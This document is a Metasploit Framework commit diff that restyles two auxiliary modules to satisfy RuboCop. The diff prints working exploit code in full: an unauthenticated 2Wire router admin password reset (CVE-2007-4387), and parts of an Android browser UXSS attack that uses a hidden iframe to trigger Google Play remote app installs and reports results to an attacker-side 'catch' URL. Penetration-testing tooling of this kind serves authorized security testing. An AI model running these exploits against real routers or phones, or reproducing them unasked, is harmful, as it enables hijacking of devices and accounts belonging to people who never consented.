Merge pull request rapid7#20202 from bcoles/rubocop-modules-auxiliary-admin

modules/auxiliary/admin: Resolve RuboCop violations

Author: jheysel-r7

modules/auxiliary/admin/2wire/xslt_password_reset.rb

@@ -6,138 +6,147 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "2Wire Cross-Site Request Forgery Password Reset Vulnerability",
-      'Description'    => %q{
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => '2Wire Cross-Site Request Forgery Password Reset Vulnerability',
+        'Description' => %q{
           This module will reset the admin password on a 2Wire wireless router.  This is
-        done by using the /xslt page where authentication is not required, thus allowing
-        configuration changes (such as resetting the password) as administrators.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'hkm [at] hakim.ws',              #Initial discovery, poc
-          'Travis Phillips',  #Msf module
+          done by using the /xslt page where authentication is not required, thus allowing
+          configuration changes (such as resetting the password) as administrators.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'hkm [at] hakim.ws', # Initial discovery, poc
+          'Travis Phillips', # Msf module
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2007-4387' ],
           [ 'OSVDB', '37667' ],
           [ 'BID', '36075' ],
           [ 'URL', 'https://seclists.org/bugtraq/2007/Aug/225' ],
         ],
-      'DisclosureDate' => '2007-08-15' ))
-
-      register_options(
-        [
-          OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
-        ])
+        'DisclosureDate' => '2007-08-15',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('PASSWORD', [true, 'The password to reset to', 'admin'])
+      ]
+    )
   end
 
   def post_auth?
     false
   end
 
   def run
-
     print_status("Attempting to connect to http://#{rhost}/xslt?PAGE=A07 to gather information")
     res = send_request_raw(
-    {
-      'method'  => 'GET',
-      'uri'     => '/xslt?PAGE=A07',
-    }, 25)
+      {
+        'method' => 'GET',
+        'uri' => '/xslt?PAGE=A07'
+      }, 25
+    )
 
-    if not res
-      print_error("No response from server")
+    if !res
+      print_error('No response from server')
       return
     end
 
     # check to see if we get HTTP OK
     if (res.code == 200)
-      print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header")
+      print_status('Okay, Got an HTTP 200 (okay) code. Verifying Server header')
     else
-      print_error("Did not get HTTP 200, URL was not found. Exiting!")
+      print_error('Did not get HTTP 200, URL was not found. Exiting!')
       return
     end
 
     # Check to verify server reported is a 2wire router
-    if (res.headers['Server'].match(/2wire Gateway/i))
+    if res.headers['Server'].match(/2wire Gateway/i)
       print_status("Server is a 2wire Gateway! Grabbing info\n")
     else
       print_error("Target doesn't seem to be a 2wire router. Exiting!")
       return
     end
 
-    print_status("---===[ Router Information ]===---")
+    print_status('---===[ Router Information ]===---')
 
     # Grabbing the Model Number
-    if res.body.match(/<td class="textmono">(.*)<\/td>/i)
-      model = $1
+    if res.body.match(%r{<td class="textmono">(.*)</td>}i)
+      model = ::Regexp.last_match(1)
       print_status("Model: #{model}")
     end
 
     # Grabbing the serial Number
-    if res.body.match(/<td class="data">(\d{12})<\/td>/i)
-      serial = $1
+    if res.body.match(%r{<td class="data">(\d{12})</td>}i)
+      serial = ::Regexp.last_match(1)
       print_status("Serial: #{serial}")
     end
 
     # Grabbing the Hardware Version
-    if res.body.match(/<td class="data">(\d{4}-\d{6}-\d{3})<\/td>/i)
-      hardware = $1
+    if res.body.match(%r{<td class="data">(\d{4}-\d{6}-\d{3})</td>}i)
+      hardware = ::Regexp.last_match(1)
       print_status("Hardware Version: #{hardware}")
     end
 
     # Check the Software Version
-    if res.body.match(/<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})<\/td>/i)
-      ver = $1
+    if res.body.match(%r{<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>}i)
+      ver = ::Regexp.last_match(1)
       print_status("Software version: #{ver}")
     else
-      print_error("Target is not a version 5 router. Exiting!")
+      print_error('Target is not a version 5 router. Exiting!')
       return
     end
 
     # Grabbing the Key Code
-    if res.body.match(/<td class="data">(\w{4}-\w{4}-\w{4}-\w{4}-\w{4})<\/td>/i)
-      key = $1
+    if res.body.match(%r{<td class="data">(\w{4}-\w{4}-\w{4}-\w{4}-\w{4})</td>}i)
+      key = ::Regexp.last_match(1)
       print_status("Key Code: #{key}\n")
     end
 
     print_status("Attempting to exploit Password Reset Vulnerability on #{rhost}")
     print_status("Connecting to http://#{rhost}/xslt?PAGE=H04 to make sure page exist.")
 
     res = send_request_raw(
-    {
-      'method'  => 'GET',
-      'uri'     => '/xslt?PAGE=H04',
-    }, 25)
+      {
+        'method' => 'GET',
+        'uri' => '/xslt?PAGE=H04'
+      }, 25
+    )
 
-    if ( res and res.code == 200 and res.body.match(/<title>System Setup - Password<\/title>/i))
+    if res && (res.code == 200) && res.body.match(%r{<title>System Setup - Password</title>}i)
       print_status("Found password reset page. Attempting to reset admin password to #{datastore['PASSWORD']}")
 
-      data  = 'PAGE=H04_POST'
+      data = 'PAGE=H04_POST'
       data << '&THISPAGE=H04'
       data << '&NEXTPAGE=A01'
       data << '&PASSWORD=' + datastore['PASSWORD']
       data << '&PASSWORD_CONF=' + datastore['PASSWORD']
       data << '&HINT='
 
       res = send_request_cgi(
-      {
-        'method'  => 'POST',
-        'uri'     => '/xslt',
-        'data'    => data,
-      }, 25)
-
-      if res and res.code == 200
+        {
+          'method' => 'POST',
+          'uri' => '/xslt',
+          'data' => data
+        }, 25
+      )
+
+      if res && (res.code == 200)
         cookies = res.get_cookies
-        if cookies && cookies.match(/(.*); path=\//)
-          cookie= $1
+        if cookies && cookies.match(%r{(.*); path=/})
+          cookie = ::Regexp.last_match(1)
           print_good("Got cookie #{cookie}. Password reset was successful!\n")
         end
       end
     end
-
   end
 end

modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb

@@ -8,38 +8,46 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Android Browser RCE Through Google Play Store XFO',
-      'Description'    => %q{
-        This module combines two vulnerabilities to achieve remote code
-        execution on affected Android devices. First, the module exploits
-        CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in
-        versions of Android's open source stock browser (the AOSP Browser) prior to
-        4.4. Second, the Google Play store's web interface fails to enforce a
-        X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be
-        targeted for script injection. As a result, this leads to remote code execution
-        through Google Play's remote installation feature, as any application available
-        on the Google Play store can be installed and launched on the user's device.
-
-        This module requires that the user is logged into Google with a vulnerable browser.
-
-        To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.
-      },
-      'Author'         => [
-        'Rafay Baloch', # Original UXSS vulnerability
-        'joev'          # Play Store vector and Metasploit module
-      ],
-      'License'        => MSF_LICENSE,
-      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
-      'PassiveActions' => [ 'WebServer' ],
-      'References' => [
-        [ 'URL', 'http://web.archive.org/web/20230321034739/https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/'],
-        [ 'URL', 'https://web.archive.org/web/20150316151817/http://1337day.com/exploit/description/22581' ],
-        [ 'OSVDB', '110664' ],
-        [ 'CVE', '2014-6041' ]
-      ],
-      'DefaultAction'  => 'WebServer'
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Android Browser RCE Through Google Play Store XFO',
+        'Description' => %q{
+          This module combines two vulnerabilities to achieve remote code
+          execution on affected Android devices. First, the module exploits
+          CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in
+          versions of Android's open source stock browser (the AOSP Browser) prior to
+          4.4. Second, the Google Play store's web interface fails to enforce a
+          X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be
+          targeted for script injection. As a result, this leads to remote code execution
+          through Google Play's remote installation feature, as any application available
+          on the Google Play store can be installed and launched on the user's device.
+
+          This module requires that the user is logged into Google with a vulnerable browser.
+
+          To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.
+        },
+        'Author' => [
+          'Rafay Baloch', # Original UXSS vulnerability
+          'joev'          # Play Store vector and Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'Actions' => [[ 'WebServer', { 'Description' => 'Serve exploit via web server' } ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'References' => [
+          [ 'URL', 'http://web.archive.org/web/20230321034739/https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/'],
+          [ 'URL', 'https://web.archive.org/web/20150316151817/http://1337day.com/exploit/description/22581' ],
+          [ 'OSVDB', '110664' ],
+          [ 'CVE', '2014-6041' ]
+        ],
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options([
       OptString.new('PACKAGE_NAME', [
@@ -53,10 +61,10 @@ def initialize(info = {})
         'com.swlkr.rickrolld/.RickRoll'
       ]),
       OptBool.new('DETECT_LOGIN', [
-        true, "Prevents the exploit from running if the user is not logged into Google", true
+        true, 'Prevents the exploit from running if the user is not logged into Google', true
       ]),
       OptBool.new('HIDE_IFRAME', [
-        true, "Hide the exploit iframe from the user", true
+        true, 'Hide the exploit iframe from the user', true
       ])
     ])
   end
@@ -68,7 +76,7 @@ def on_request_uri(cli, request)
       print_error request.body[0..400]
       send_response_html(cli, '')
     else
-      print_status("Sending initial HTML ...")
+      print_status('Sending initial HTML ...')
       send_response_html(cli, exploit_html)
     end
   end
@@ -140,7 +148,7 @@ def exploit_html
 
   def detect_login_js
     if datastore['DETECT_LOGIN']
-      %Q|
+      %|
         var img = document.createElement('img');
         img.onload = exploit;
         img.onerror = function() {
@@ -150,7 +158,7 @@ def detect_login_js
           x.send('Exploit failed: user is not logged into google.com')
         };
         img.setAttribute('style', HIDDEN_STYLE);
-        var rand = '&d=#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';
+        var rand = '&d=#{Rex::Text.rand_text_alphanumeric(rand(5..16))}';
         img.setAttribute('src', 'https://accounts.google.com/CheckCookie?continue=https%3A%2F%2Fwww.google.com%2Fintl%2Fen%2Fimages%2Flogos%2Faccounts_logo.png'+rand);
         document.body.appendChild(img);
       |
@@ -168,7 +176,7 @@ def hidden_css
   end
 
   def backend_url
-    proto = (datastore["SSL"] ? "https" : "http")
+    proto = (datastore['SSL'] ? 'https' : 'http')
     myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
     port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
     "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"